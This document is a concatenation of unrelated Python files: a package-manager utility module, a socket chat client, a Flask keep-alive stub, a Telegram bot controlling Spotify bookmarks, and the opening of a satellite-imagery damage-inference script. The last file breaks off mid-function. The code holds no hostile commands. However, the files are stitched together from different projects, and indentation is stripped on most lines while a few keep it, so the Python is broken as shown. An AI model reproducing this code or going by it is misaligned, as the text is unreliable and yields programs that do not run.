utils.py
|
import os
import sys
import re
import yaml
import argparse
import logging
import subprocess
import platform
import time
import io
import json
import shlex
import signal
import builtins
import requests
import progressbar
import rfc6266
import locale
import codecs
from datetime import datetime
__all__ = [
'run_process',
'log',
'parser',
'subparsers',
'platform_name',
'platform_arch',
'system_name',
'info_from_name',
'get_install_path',
'get_package_yaml',
'get_package_list',
'save_package_list',
'find_python',
'system',
'download'
]
log = logging.getLogger('dpm')
parser = argparse.ArgumentParser(prog='dpm')
subparsers = parser.add_subparsers(help='command', metavar='command')
subparsers.required = True
from threading import Thread
from queue import Queue, Empty
import ctypes
class DownloadError(Exception):
def __str__(self):
return 'DownloadError: ' + Exception.__str__(self)
def download(target_dir, url):
response = requests.get(url, stream=True)
if not response.ok:
raise DownloadError('Can\'t download %s: response status: %i'%\
(url, response.status_code))
fname = None
cd = response.headers.get('Content-Disposition')
if cd:
fname = rfc6266.parse_headers(cd).filename_unsafe
if not fname:
fname = os.path.basename(url)
log.info('Downloading %s'%fname)
    total = response.headers.get('content-length', '').strip()
    if total:
        total = int(total)
path = os.path.join(target_dir, fname)
with open(path, 'wb') as f:
widgets = [progressbar.Percentage(), ' ', progressbar.Bar(),
' ', progressbar.ETA(), ' ', progressbar.FileTransferSpeed()]
pbar = progressbar.ProgressBar(widgets=widgets, max_value=total).start()
size = 0
for block in response.iter_content(1024):
size += len(block)
f.write(block)
pbar.update(size)
pbar.finish()
return path
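# Usage sketch for download() (not part of the original module; the target
# directory and URL below are hypothetical placeholders):
#
#     saved_path = download('/tmp', 'https://example.com/archive.tar.gz')
#     log.info('saved to %s' % saved_path)
#
# The filename is taken from the Content-Disposition header when present,
# otherwise from the last path segment of the URL.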
def run_process(*args, command=None, stop=None, stdout=log.debug,
stderr=log.error, cwd=None, format_kwargs=None,
yield_func=None, **kwargs):
if isinstance(command, dict):
if 'cwd' in command:
command_cwd = command['cwd']
if format_kwargs:
command_cwd = command_cwd.format(**format_kwargs)
command_cwd = os.path.expandvars(command_cwd)
if not os.path.isabs(command_cwd) and cwd:
cwd = os.path.join(cwd, command_cwd)
else:
cwd = command_cwd
if 'args' in command:
args = tuple(command['args']) + args
elif isinstance(command, str):
args = tuple(shlex.split(command)) + args
if format_kwargs:
args = [v.format(**format_kwargs) for v in args]
log.debug('running: %s'%' '.join([shlex.quote(v) for v in args]))
current_dir = os.getcwd()
    if cwd:
        os.chdir(cwd)
try:
proc = subprocess.Popen(args, stdout = subprocess.PIPE,
stderr = subprocess.PIPE, **kwargs)
finally:
os.chdir(current_dir)
def wait():
proc.wait()
q.put(lambda: None)
def read(stream, out):
if isinstance(stream, io.TextIOWrapper):
if callable(out):
result = ''
for char in iter(lambda: stream.read(1), ''):
if char in ('\n', '\r'):
if result:
q.put(lambda o=result: out(o))
result = ''
else:
result += char
if result:
q.put(lambda o=result[:-1]: out(o))
elif isinstance(out, io.StringIO):
for data in iter(stream.read, b''):
out.write(data)
elif isinstance(out, io.BytesIO):
for data in iter(stream.read, b''):
out.write(data.encode('utf8'))
else:
if callable(out):
encoding = locale.getpreferredencoding(False)
result = ''
it = iter(lambda: stream.read(1), b'')
for char in codecs.iterdecode(it, encoding, errors='ignore'):
if char in ('\n', '\r'):
q.put(lambda o=result: out(o))
result = ''
else:
result += char
if result:
q.put(lambda o=result[:-1]: out(o))
elif isinstance(out, io.StringIO):
encoding = locale.getpreferredencoding(False)
it = iter(stream.read, b'')
for data in codecs.iterdecode(it, encoding, errors='ignore'):
out.write(data)
elif isinstance(out, io.BytesIO):
for data in iter(stream.read, b''):
out.write(data)
q = Queue()
running = True
exc = None
threads = [ Thread(target = wait, daemon=True) ]
if stdout is not None:
th = Thread(target = read, daemon=True, args=(proc.stdout, stdout))
threads.append(th)
if stderr is not None:
th = Thread(target = read, daemon=True, args=(proc.stderr, stderr))
threads.append(th)
for v in threads:
v.start()
while True:
try:
while True:
if yield_func is not None:
yield_func()
if running and stop is not None and stop():
log.debug('process terminated!')
try:
os.kill(proc.pid, signal.SIGTERM)
except:
pass
running = False
alive = any((v.is_alive() for v in threads))
try:
q.get(alive, timeout=0.1)()
except Empty:
if not alive:
break
break
except KeyboardInterrupt as e:
if running:
log.debug('process interrupted!')
try:
os.kill(proc.pid, signal.SIGINT)
except:
pass
running = False
exc = e
if exc:
raise exc
else:
log.debug('return code: %i'%proc.returncode)
return proc.returncode == 0
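# Usage sketch for run_process() (illustrative only; the command dict and
# format_kwargs shown here are hypothetical):
#
#     ok = run_process(command={'args': ['git', 'clone', '{repo}'], 'cwd': '{dest}'},
#                      cwd='/tmp',
#                      format_kwargs={'repo': 'https://example.com/r.git', 'dest': 'work'})
#
# stdout lines go to log.debug and stderr lines to log.error by default; the
# return value is True when the process exits with code 0.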
is_64bits = sys.maxsize > 2**32
system = platform.system()
if is_64bits:
platform_arch = '64'
else:
platform_arch = '32'
if system == 'Windows':
system_name = 'win'
platform_name = 'win'+platform_arch
py_search_paths = [
['python.exe'],
['Scripts', 'python.exe'],
]
elif system == 'Linux':
system_name = 'linux'
platform_name = 'linux'+platform_arch
py_search_paths = [
['bin', 'python'],
]
else:
    system_name = 'unknown'
    platform_name = 'unknown'+platform_arch
    py_search_paths = []
def find_python(python_path, base_path=''):
python_path = os.path.expandvars(python_path)
base_path = os.path.expandvars(base_path)
if not os.path.isabs(python_path):
python_path = os.path.join(base_path, python_path)
if os.path.isdir(python_path):
for v in py_search_paths:
result = os.path.join(python_path, *v)
if os.path.exists(result):
return os.path.normpath(result)
else:
return os.path.normpath(python_path)
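# Usage sketch for find_python() (paths are hypothetical):
#
#     py = find_python('env', base_path='/opt/dpm')
#     # On Windows this looks for /opt/dpm/env/python.exe or
#     # /opt/dpm/env/Scripts/python.exe; on Linux for /opt/dpm/env/bin/python.
#     # A path that is not a directory is returned unchanged (normalized).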
packages_install_dir = os.path.join(os.path.expanduser("~"), ".DICE", "data", "packages")
dice_config = os.path.join(os.path.expanduser("~"), ".DICE", "config", "dice.json")
def get_install_path(package_name):
package_name = package_name.replace('/', '-')
default_dir = packages_install_dir
paths = []
if os.path.exists(dice_config):
with open(dice_config) as f:
cfg = json.load(f)
paths += cfg.get('packages_dirs', [])
if 'packages_install_dir' in cfg:
default_dir = cfg['packages_install_dir']
paths.append(default_dir)
for v in set(paths):
package_dir = os.path.join(v, package_name)
if os.path.exists(package_dir):
return package_dir
return os.path.join(default_dir, package_name)
def get_package_yaml(package_name, file_name):
package_yaml = os.path.join(get_install_path(package_name), file_name)
if os.path.exists(package_yaml):
with open(package_yaml, 'r') as f:
            return yaml.safe_load(f)
def get_package_list(package_name, file_name):
path = os.path.join(get_install_path(package_name), file_name)
if os.path.exists(path):
with open(path, 'r') as f:
return f.read().split('\n')
return []
def save_package_list(package_name, file_name, items):
install_path = get_install_path(package_name)
path = os.path.join(install_path, file_name)
with open(path, 'w') as f:
f.write('\n'.join(items))
def info_from_name(package):
values = package.split('==')
name, values = values[0], values[1:]
version, values = (values[0], values[1:]) if values else ('latest', values)
machine, values = (values[0], values[1:]) if values else (platform_name, values)
return name, version, machine
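# Usage sketch for info_from_name() (package names are hypothetical):
#
#     info_from_name('tools/foo==1.2==linux64')   # -> ('tools/foo', '1.2', 'linux64')
#     info_from_name('tools/foo')                 # -> ('tools/foo', 'latest', platform_name)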
|
client.py
|
import socket
import threading
name = input("Введите имя: ")
# Connecting To Server
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(('127.0.0.1', 3415))
def receive():
while True:
try:
message = client.recv(1024).decode('utf-8')
if message == 'NICK':
client.send(name.encode('utf-8'))
else:
print(message)
except:
print("Ошибка!")
client.close()
break
def write():
while True:
message = f"{name}: {input()}"
client.send(message.encode('utf-8'))
receive_thread = threading.Thread(target=receive)
receive_thread.start()
write_thread = threading.Thread(target=write)
write_thread.start()
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return """
    There is currently an error I haven't found yet.
    It causes some servers, including the support server,
    to be unable to perform commands.
    I'm working on fixing it but cannot find the error anywhere."""
def run():
app.run(host="0.0.0.0", port=8080)
def keep_alive():
server = Thread(target=run)
server.start()
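# Usage sketch (hypothetical bot script): call keep_alive() before starting a
# long-running client so the Flask thread keeps the process reachable, e.g.
#
#     keep_alive()
#     # bot.run(TOKEN)  # whatever long-running loop follows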
|
telegramcontroller.py
|
""" Processing/relaying telegram messages"""
import collections.abc
import functools
import threading
import telegram
import telegram.bot
import telegram.ext
from spottelbot import botconfig
from spottelbot import botexceptions
from spottelbot import spotifycontroller
max_message_length = 4096
def __parse_last_arg(parse_string):
"""
:param parse_string: The string to parse
:type parse_string: str
    :return: A tuple containing the lower and upper bound
:rtype: tuple
Parses arguments like "1-5", "1-".
"""
lower_bound = upper_bound = 0
value_list = parse_string.split('-')
# No "-" in the value
if len(value_list) == 1:
raise botexceptions.InvalidRange(parse_string)
# "-value"
if value_list[0] == "":
# Edge Case: "-5-6" (negative value as first argument)
if len(value_list) != 2:
raise botexceptions.InvalidRange(parse_string)
lower_bound = 1
else:
lower_bound = int(value_list[0])
# "2-"
if value_list[1] == "":
upper_bound = spotifycontroller.last_limit
else:
upper_bound = int(value_list[1])
return lower_bound, upper_bound
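# Illustrative expectations for __parse_last_arg (not part of the original module):
#
#     __parse_last_arg("1-5")   # -> (1, 5)
#     __parse_last_arg("-5")    # -> (1, 5)
#     __parse_last_arg("2-")    # -> (2, spotifycontroller.last_limit)
#     __parse_last_arg("5")     # raises botexceptions.InvalidRange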
def last_range(arguments):
"""
:param arguments: List of arguments given to "/last"
:type arguments: list
    :return: lower and upper bound
    :rtype: tuple
    Converts the arguments to "/last" into a tuple (lower boundary, upper boundary). Raises an InvalidRange exception if
    the arguments are out of bounds or invalid
"""
lower_bound = upper_bound = 0
# Empty argument ("/last")
if not arguments:
lower_bound = 1
upper_bound = spotifycontroller.last_limit
# "/last with one argument.
elif len(arguments) == 1:
value = arguments[0]
# Case 1: /last with exactly one numeric argument (/last 5)
if value.isdigit():
lower_bound = 1
upper_bound = int(arguments[0])
else:
        # Case 2: /last with a ranged argument (/last 1-5, /last 5-, /last -10)
lower_bound, upper_bound = __parse_last_arg(value)
# /last with two arguments: /last 1- 5, /last 1 -5...
elif len(arguments) == 2 or len(arguments) == 3:
try:
value = "".join(arguments)
lower_bound, upper_bound = __parse_last_arg(value)
except ValueError:
raise botexceptions.InvalidRange(value)
else:
        # Too many arguments
raise botexceptions.InvalidRange(" ".join(arguments))
if upper_bound < 1 or upper_bound > spotifycontroller.last_limit:
raise botexceptions.InvalidRange(upper_bound)
if lower_bound < 1 or lower_bound > spotifycontroller.last_limit:
raise botexceptions.InvalidRange(lower_bound)
return lower_bound, upper_bound
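# Illustrative expectations for last_range (not part of the original module):
#
#     last_range([])               # -> (1, spotifycontroller.last_limit)
#     last_range(["5"])            # -> (1, 5)
#     last_range(["4-10"])         # -> (4, 10)
#     last_range(["1", "-", "5"])  # joined and treated like "1-5"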
class TelegramController(object):
# Decorators used for methods
class Decorators(object):
        # Commands/methods which are not for general use (in fact, most of them, with the exception of "whoami")
@classmethod
        def restricted(cls, method):
def wrapper(self, bot: telegram.Bot, update: telegram.Update, args):
user: telegram.User = update.message.from_user
if self._config.has_access("@" + user.username) or self._config.has_access(user.id):
return method(self, bot, update, args)
else:
return self.unauthorized(bot, update, args)
return wrapper
        # Autosave (if on; currently always on, setting autosave on/off is yet to be written) for methods which
        # affect the config file (users, bookmarks)
@classmethod
        def autosave(cls, method):
def wrapper(self, *args, **kwargs):
# TODO: Autosave on/off
retval = method(self, *args, **kwargs)
self._config.save_config(None)
return retval
return wrapper
def __init__(self, config: botconfig.BotConfig, spotify_controller: spotifycontroller.SpotifyController):
"""
:param config: The botconfig
:type config: botconfig.BotConfig
:param spotify_controller: spotify controller
:type spotify_controller: spotifycontroller.SpotifyController
"""
self._config = config
self._spotify_controller = spotify_controller
self._updater = None
self._output_buffer = ""
# TODO: /adduser, /deluser /users
# TODO: /autosave (on/off)
# TODO: /mode (spotify, html, plain)
# Command(s), handler, Helptext (short), Helptext(list) long
self._handlers = (
(("bye", "quit", "shutdown"), self.__quit_handler, "Shutdown the bot (caution!)", (
"Shuts down the bot. After shutdown you have to start the again via CLI",
"*Note:* This command may take a couple of seconds before the bot process finally finishes")),
("whoami", self.__whoami_handler, "Shows the Username and it's numeric ID", (
"Returns the username and it's numeric ID to the caller",
"Useful when you get an 'Access denied' and have a look at he access rules")),
("help", self.__help_handler, "This command", ("*/help:* Show all available commands",
"*/help <command>*: Gives detailed help for the commad in question")),
("current", self.__current_handler, "Get the currently playing track", (
"Shows the currenty playing track, if any.",
"*Note:* There has to a tracking playing for this to work!",
"A track stopped at the beginning won't show up")),
("last", self.__last_handler, "Recently played tracks", (
"*last* without any parameter will get the last 50 tracks", "*/last 5* shows the last 5 tracks",
"*last 4-10* shows you track 4 to 10")),
(("show", "list"), self.__list_handler, "Shows the bookmark(s)",
("/list without any parameter lists all bookmarks", "/show <bookmarkname> shows you the <bookmarkname>")),
(("mark", "set"), self.__mark_handler, "Sets a bookmark", (
"*/mark* without any parameter will set the special bookmark 'current' to the currently playing song (if any)",
"*/mark 5* sets the special bookmark 'current' to the 5th played track",
"*/mark mybookmark 6* sets the bookmark 'mybookmark' to the 6th recently played track",
"*Note*: boomarks will be transformed to lower case, so 'BookMark' and 'bookmark' are the same")),
(("clear", "delete"), self.__clear_handler, "Deletes bookmark(s) (or all)", (
"*/clear <bookmarkname>* deletes the bookmark", "*/clear a b c* deletes bookmarks a, b and c",
"*/clear all* clears all bookmarks")),
("reload", self.__reload_handler, "Reloads config", "Reloads the config. Not very useful (yet)", None)
)
def connect(self):
"""
:return:
:rtype:
Connect to telegram, start the loop
"""
self._updater = telegram.ext.Updater(self._config.telegram_token)
for handler in self._handlers:
command_s = handler[0]
method_handler = handler[1]
self._updater.dispatcher.add_handler(telegram.ext.CommandHandler(command_s, method_handler, pass_args=True))
# Last handler - a catch all handler for unknown commands
self._updater.dispatcher.add_handler(
telegram.ext.MessageHandler(telegram.ext.Filters.command, self.__unknown_handler))
self._updater.start_polling()
def unauthorized(self, bot: telegram.Bot, update: telegram.Update, args):
bot.send_message(chat_id=update.message.chat_id, text="*You are not authorized to use this function*",
parse_mode=telegram.ParseMode.MARKDOWN)
def __send_message_buffer(self, bot: telegram.Bot, chat_id: str, text: str, final=False, **kwargs):
"""
:param bot: Telegram bot
:type bot: telegram.Bot
:param chat_id: Chat ID to send the messages to
:type chat_id: str
:param text: The text to send
:type text: str
:param final: Last part of the message, i.e. flush the buffer?
:type final: bool
:param kwargs: args to pass to bot.send_message()
:type kwargs:
:return:
:rtype:
Sends a bunch of message lines to the chat_id, honoring telegram's max message length. If a single line
(text) should exceed the maximum message length, an exception will be raised
"""
        # Not sure if there should be a separate buffer for each chat_id, i.e. is this method thread safe? Does
        # it need to be? For now there won't be buffers per chat_id, only one single, global one.
message_length = len(text)
if message_length >= max_message_length:
raise botexceptions.TelegramMessageLength(message_length)
if len(self._output_buffer) + message_length >= max_message_length:
bot.send_message(chat_id=chat_id, text=self._output_buffer, **kwargs)
self._output_buffer = text
else:
self._output_buffer += text
# There's no case final is set and there's an empty buffer: If buffer is full, buffer contains the
# message containing the potential overflow.
if final:
bot.send_message(chat_id=chat_id, text=self._output_buffer, **kwargs)
self._output_buffer = ""
# Since traversing the command tuples may be expensive, it makes sense caching the results.
@functools.lru_cache(maxsize=20)
def __find_help_for_command(self, command: str):
"""
:param command: The command in question
:type command: str
:return: tuple of help (each entry one line), string (quick help) or none if command not found
:rtype: tuple or str
Find the corresponding help text for the command, or None if unknown command
"""
found = False
quick_help = None
verbose_help = None
for entry in self._handlers:
command_s = entry[0]
quick_help = entry[2]
verbose_help = entry[3]
            if isinstance(command_s, collections.abc.Iterable) and not isinstance(command_s, str):
if command in command_s:
found = True
break
else:
if command == command_s:
found = True
                    break
if not found:
return None
if verbose_help:
return verbose_help
else:
return quick_help + "\n"
# /clear, /delete...
@Decorators.restricted
@Decorators.autosave
def __clear_handler(self, bot: telegram.Bot, update: telegram.Update, args):
message_list = self.delete(args)
for message in message_list:
self.__send_message_buffer(bot, update.message.chat_id, text=message, final=False,
parse_mode=telegram.ParseMode.MARKDOWN)
self.__send_message_buffer(bot, update.message.chat_id, text="", final=True,
parse_mode=telegram.ParseMode.MARKDOWN)
# /current
def __current_handler(self, bot: telegram.Bot, update: telegram.Update, args):
message = self._spotify_controller.get_current()
if not message:
message = "Nothing playing at the moment"
bot.send_message(chat_id=update.message.chat_id, text=message)
# /help, /help add, ...
@Decorators.restricted
def __help_handler(self, bot: telegram.Bot, update: telegram.Update, args):
# /help without an argument -> List all commands and the quick help
if len(args) == 0:
for entry in self._handlers:
text = "*"
command_s = entry[0]
quick_help = entry[2]
                if isinstance(command_s, collections.abc.Iterable) and not isinstance(command_s, str):
text += ", ".join(command_s)
else:
text += command_s
text += "*: {}\n".format(quick_help)
self.__send_message_buffer(bot, update.message.chat_id, text=text, final=False,
parse_mode=telegram.ParseMode.MARKDOWN)
self.__send_message_buffer(bot, update.message.chat_id, text="", final=True,
parse_mode=telegram.ParseMode.MARKDOWN)
else:
# /help help, /help clear, /help mark clear...
for arg in args:
help = self.__find_help_for_command(arg)
if help:
self.__send_message_buffer(bot, update.message.chat_id, text="*{}*: ".format(arg), final=False,
parse_mode=telegram.ParseMode.MARKDOWN)
                    if isinstance(help, collections.abc.Iterable) and not isinstance(help, str):
for help_line in help:
self.__send_message_buffer(bot, update.message.chat_id, text=help_line + "\n", final=False,
parse_mode=telegram.ParseMode.MARKDOWN)
else:
self.__send_message_buffer(bot, update.message.chat_id, text=help + "\n", final=False,
parse_mode=telegram.ParseMode.MARKDOWN)
else:
# Unknown command
self.__send_message_buffer(bot, update.message.chat_id, text="*{}: Unknown command*\n".format(arg),
final=False, parse_mode=telegram.ParseMode.MARKDOWN)
# Empty Buffer
self.__send_message_buffer(bot, update.message.chat_id, text="", final=True,
parse_mode=telegram.ParseMode.MARKDOWN)
# /last
@Decorators.restricted
def __last_handler(self, bot: telegram.Bot, update: telegram.Update, args):
try:
lower, upper = last_range(args)
if lower > upper:
raise botexceptions.InvalidRange("{}-{}".format(lower, upper))
output_list = self._spotify_controller.get_last_tracks(lower, upper)
for i, item in enumerate(output_list, lower):
text = "*{}*: {}\n".format(i, item)
self.__send_message_buffer(bot, update.message.chat_id, text=text, final=False,
parse_mode=telegram.ParseMode.MARKDOWN)
self.__send_message_buffer(bot, update.message.chat_id, text="", final=True,
parse_mode=telegram.ParseMode.MARKDOWN)
except botexceptions.InvalidRange as range_error:
bot.send_message(chat_id=update.message.chat_id,
text="*Invalid range {}. Must be between 1 and {}*".format(range_error.invalid_argument,
spotifycontroller.last_limit),
parse_mode=telegram.ParseMode.MARKDOWN)
# /list, /show
@Decorators.restricted
def __list_handler(self, bot: telegram.Bot, update: telegram.Update, args):
# 1.) /list without any argument -> list all bookmarks
if len(args) == 0:
bookmark_list = self._config.get_bookmarks()
if bookmark_list:
text = ""
for bookmark in bookmark_list:
track_id, playlist_id = self._config.get_bookmark(bookmark)
text = "*{}*: {}".format(bookmark, self._spotify_controller.get_track(track_id))
if playlist_id:
text += " (Playlist {})".format(self._spotify_controller.get_playlist(playlist_id))
text += "\n"
self.__send_message_buffer(bot, update.message.chat_id, text=text, final=False,
parse_mode=telegram.ParseMode.MARKDOWN)
self.__send_message_buffer(bot, update.message.chat_id, text="", final=True,
parse_mode=telegram.ParseMode.MARKDOWN)
else:
self.__send_message_buffer(bot, update.message.chat_id, text="No bookmarks found", final=True,
parse_mode=telegram.ParseMode.MARKDOWN)
# /mark, /set..
@Decorators.restricted
@Decorators.autosave
def __mark_handler(self, bot: telegram.Bot, update: telegram.Update, args):
try:
message = self.mark(args)
except botexceptions.InvalidBookmark as invalid:
message = "*Invalid bookmark(s)/argument(s): {}*".format(invalid.invalid_bookmark)
bot.send_message(chat_id=update.message.chat_id, text=message, parse_mode=telegram.ParseMode.MARKDOWN)
def mark(self, arguments: list) -> str:
"""
:param arguments: Arguments to the "/mark" command
:type arguments: list
        :return: Output string ("Marked", "currently nothing playing")
:rtype: str
        Sets a bookmark. Raises an InvalidBookmark exception if something is wrong
"""
track_id = playlist_id = None
bookmark_name = None
index = -1
if not arguments:
# No arguments ("/mark")
index = botconfig.bookmark_current
bookmark_name = botconfig.bookmark_current
elif len(arguments) == 1:
            # /mark with one argument (/mark current, /mark 5 == /mark current 5, /mark a == /mark a current)
value = arguments[0]
if value.isdigit():
# /mark 5, /mark 4
index = int(value)
bookmark_name = botconfig.bookmark_current
else:
                # /mark a, /mark current, ...
if value == botconfig.bookmark_current:
# /mark current
index = botconfig.bookmark_current
bookmark_name = botconfig.bookmark_current
else:
# /mark a, /mark MyBookmark
index = botconfig.bookmark_current
bookmark_name = value
elif len(arguments) == 2:
# /mark with two arguments - /mark current 5,/mark mybookmark current, /mark mybookmark 1
bookmark_name = arguments[0]
value = arguments[1]
if value.isdigit():
# /mark bookmark 5
index = int(value)
elif value == botconfig.bookmark_current:
index = botconfig.bookmark_current
else:
# /mark bookmark something ?
raise botexceptions.InvalidBookmark(value)
else:
# More than 2 arguments - /mark bookmark 5 3 4. Makes no sense
raise botexceptions.InvalidBookmark(" ".join(arguments))
if index == bookmark_name or index == botconfig.bookmark_current:
(track_id, playlist_id) = self._spotify_controller.get_current(formatted=False)
if not track_id:
return "Cannot set bookmark: Nothing playing right now"
else:
(track_id, playlist_id) = self._spotify_controller.get_last_index(index)
self._config.set_bookmark(bookmark_name, track_id, playlist_id)
return "Bookmark *{}* set".format(bookmark_name)
# /quit, /shutdown, bye
@Decorators.restricted
def __quit_handler(self, bot: telegram.Bot, update: telegram.Update, args):
bot.send_message(chat_id=update.message.chat_id, text="Shutting down")
threading.Thread(target=self.__quit).start()
# Has to be called from another thread
def __quit(self):
self._updater.stop()
self._updater.is_idle = False
# /reload
@Decorators.restricted
def __reload_handler(self, bot: telegram.Bot, update: telegram.Update, args):
output = self._config.load_config(None)
answer = ""
if output:
answer = "*Error: " + output + "*"
else:
answer = "Config reloaded"
bot.send_message(chat_id=update.message.chat_id, text=answer, parse_mode=telegram.ParseMode.MARKDOWN)
# "/whoami"
def __whoami_handler(self, bot: telegram.Bot, update: telegram.Update, args):
user: telegram.User = update.message.from_user
message = "You are @{} ({})".format(user.username, user.id)
bot.send_message(chat_id=update.message.chat_id, text=message)
    # Handler for unknown commands
def __unknown_handler(self, bot: telegram.Bot, update: telegram.Update):
bot.send_message(chat_id=update.message.chat_id, text="I dont' understand the command")
def delete(self, arguments: list) -> list:
"""
:param arguments: The arguments given to the "/delete" command
:type arguments: list
:return: list of output lines
:rtype: list
        Deletes one (or several) bookmark(s), or all of them (/delete all, /clear all). Raises an InvalidBookmark/UnknownBookmark exception
"""
# /delete without an argument
if arguments is None:
raise botexceptions.InvalidBookmark("<none>")
output_list = []
for argument in arguments:
if argument == botconfig.bookmark_all:
self._config.clear_bookmarks()
output_list = ["*All bookmarks have been cleared*"]
break # No point in going on. All bookmarks are deleted.
try:
self.delete_single(argument)
output_list.append("Bookmark *{}* has been deleted\n".format(argument))
except botexceptions.InvalidBookmark as invalid:
output_list.append("Invalid bookmark {}\n".format(argument))
except KeyError:
output_list.append("Unknown bookmark {}\n".format(argument))
return output_list
def delete_single(self, bookmark_name: str):
"""
:param bookmark_name: Name of the bookmark. Raises InvalidBookmark if illegal
:type bookmark_name: str
:return:
:rtype:
"""
if not bookmark_name:
raise botexceptions.InvalidBookmark("<none>")
if bookmark_name.isdigit():
raise botexceptions.InvalidBookmark(bookmark_name)
self._config.clear_bookmark(bookmark_name)
def deluser(self, telegram_ids):
"""
:param telegram_ids: The arguments given to the "/deluser" command
:type telegram_ids: list
:return:
:rtype:
Removes access for one (or multiple) users. Raises the usual exceptions
"""
for single_id in telegram_ids:
self._config.remove_access(single_id)
def adduser(self, telegram_ids):
"""
:param telegram_ids: The arguments given to the /adduser command
:type telegram_ids: list
:return:
:rtype:
Adds access for one (or multiple) users. Raises the usual exceptions
"""
for single_id in telegram_ids:
self._config.add_access(single_id)
|
handler.py
|
import argparse
import copy
from functools import partial
import glob
import multiprocessing as mp
import os
from pathlib import Path
import random
import resource
import string
import sys
import numpy as np
from raster_processing import *
import rasterio.warp
from shapely.geometry import mapping
import torch
from torch.utils.data import DataLoader
from yacs.config import CfgNode
from tqdm import tqdm
from dataset import XViewDataset
from models.dual_hrnet import get_model
import inference
from inference import ModelWrapper, argmax, run_inference
from utils import build_image_transforms
class Files(object):
def __init__(self, ident, pre_directory, post_directory, output_directory, pre, post):
self.ident = ident
self.pre = pre_directory.joinpath(pre).resolve()
self.post = post_directory.joinpath(post).resolve()
self.loc = output_directory.joinpath('loc').joinpath(f'{self.ident}.tif').resolve()
self.dmg = output_directory.joinpath('dmg').joinpath(f'{self.ident}.tif').resolve()
self.over = output_directory.joinpath('over').joinpath(f'{self.ident}.tif').resolve()
self.profile = self.get_profile()
self.transform = self.profile["transform"]
self.opts = inference.Options(pre_path=self.pre,
post_path=self.post,
out_loc_path=self.loc,
out_dmg_path=self.dmg,
out_overlay_path=self.over,
geo_profile=self.profile,
vis=True,
use_gpu=True
)
def get_profile(self):
with rasterio.open(self.pre) as src:
return src.profile
def make_staging_structure(staging_path):
"""
Creates directory structure for staging.
:param staging_path: Staging path
:return: True if successful
"""
# TODO: Does this method of making directories work on windows or do we need to use .joinpath?
Path(f"{staging_path}/pre").mkdir(parents=True, exist_ok=True)
Path(f"{staging_path}/post").mkdir(parents=True, exist_ok=True)
return True
def make_output_structure(output_path):
"""
Creates directory structure for outputs.
:param output_path: Output path
    :return: True if successful
"""
Path(f"{output_path}/mosaics").mkdir(parents=True, exist_ok=True)
Path(f"{output_path}/chips/pre").mkdir(parents=True, exist_ok=True)
Path(f"{output_path}/chips/post").mkdir(parents=True, exist_ok=True)
Path(f"{output_path}/loc").mkdir(parents=True, exist_ok=True)
Path(f"{output_path}/dmg").mkdir(parents=True, exist_ok=True)
Path(f"{output_path}/over").mkdir(parents=True, exist_ok=True)
Path(f"{output_path}/shapes").mkdir(parents=True, exist_ok=True)
return True
def get_files(dirname, extensions=['.png', '.tif', '.jpg']):
"""
Gathers list of files for processing from path recursively.
:param dirname: path to parse
:param extensions: extensions to match
:return: list of files matching extensions
"""
dir_path = Path(dirname)
files = dir_path.glob('**/*')
files = [path.resolve() for path in files]
match = [f for f in files if f.suffix.lower() in extensions]
return match
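# Usage sketch for get_files() (the directory is hypothetical):
#
#     chips = get_files('/data/pre', extensions=['.tif'])
#     # returns resolved Paths found recursively under /data/pre whose suffix,
#     # lower-cased, is in the extension list.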
def reproject_helper(args, raster_tuple, procnum, return_dict):
"""
Helper function for reprojection
"""
(pre_post, src_crs, raster_file) = raster_tuple
basename = raster_file.stem
    dest_file = args.staging_directory.joinpath(pre_post).joinpath(f'{basename}.tif')
try:
return_dict[procnum] = (pre_post, reproject(raster_file, dest_file, src_crs, args.destination_crs))
except ValueError:
return None
def postprocess_and_write(config, result_dict):
"""
Postprocess results from inference and write results to file
:param config: configuration dictionary
:param result_dict: dictionary containing all required opts for each example
"""
if config.MODEL.IS_SPLIT_LOSS:
loc, cls = argmax(result_dict['loc'], result_dict['cls'])
loc = loc.numpy().astype(np.uint8)
cls = cls.numpy().astype(np.uint8)
else:
loc = torch.argmax(result_dict['loc'], dim=0, keepdim=False)
loc = loc.numpy().astype(np.uint8)
cls = copy.deepcopy(loc)
result_dict['geo_profile'].update(dtype=rasterio.uint8)
with rasterio.open(result_dict['out_loc_path'], 'w', **result_dict['geo_profile']) as dst:
dst.write(loc, 1)
with rasterio.open(result_dict['out_cls_path'], 'w', **result_dict['geo_profile']) as dst:
dst.write(cls, 1)
if result_dict['is_vis']:
mask_map_img = np.zeros((cls.shape[0], cls.shape[1], 3), dtype=np.uint8)
mask_map_img[cls == 1] = (255, 255, 255)
mask_map_img[cls == 2] = (229, 255, 50)
mask_map_img[cls == 3] = (255, 159, 0)
mask_map_img[cls == 4] = (255, 0, 0)
#for debugging original code
#compare_img = np.concatenate((result_dict['pre_image'], mask_map_img, result_dict['post_image']), axis=1)
out_dir = os.path.dirname(result_dict['out_overlay_path'])
with rasterio.open(result_dict['out_overlay_path'], 'w', **result_dict['geo_profile']) as dst:
# Go from (x, y, bands) to (bands, x, y)
mask_map_img = np.flipud(mask_map_img)
mask_map_img = np.rot90(mask_map_img, 3)
mask_map_img = np.moveaxis(mask_map_img, [0, 1, 2], [2, 1, 0])
dst.write(mask_map_img)
def main():
parser = argparse.ArgumentParser(description='Create arguments for xView 2 handler.')
parser.add_argument('--pre_directory', metavar='/path/to/pre/files/', type=Path, required=True)
parser.add_argument('--post_directory', metavar='/path/to/post/files/', type=Path, required=True)
parser.add_argument('--staging_directory', metavar='/path/to/staging/', type=Path, required=True)
parser.add_argument('--output_directory', metavar='/path/to/output/', type=Path, required=True)
parser.add_argument('--model_weight_path', metavar='/path/to/model/weights', type=Path)
parser.add_argument('--model_config_path', metavar='/path/to/model/config', type=Path)
parser.add_argument('--is_use_gpu', action='store_true', help="If True, use GPUs")
parser.add_argument('--n_procs', default=4, help="Number of processors for multiprocessing", type=int)
parser.add_argument('--batch_size', default=16, help="Number of chips to run inference on at once", type=int)
parser.add_argument('--num_workers', default=8, help="Number of workers loading data into RAM. Recommend 4 * num_gpu", type=int)
parser.add_argument('--pre_crs', help='The Coordinate Reference System (CRS) for the pre-disaster imagery.')
parser.add_argument('--post_crs', help='The Coordinate Reference System (CRS) for the post-disaster imagery.')
parser.add_argument('--destination_crs', default='EPSG:4326', help='The Coordinate Reference System (CRS) for the output overlays.')
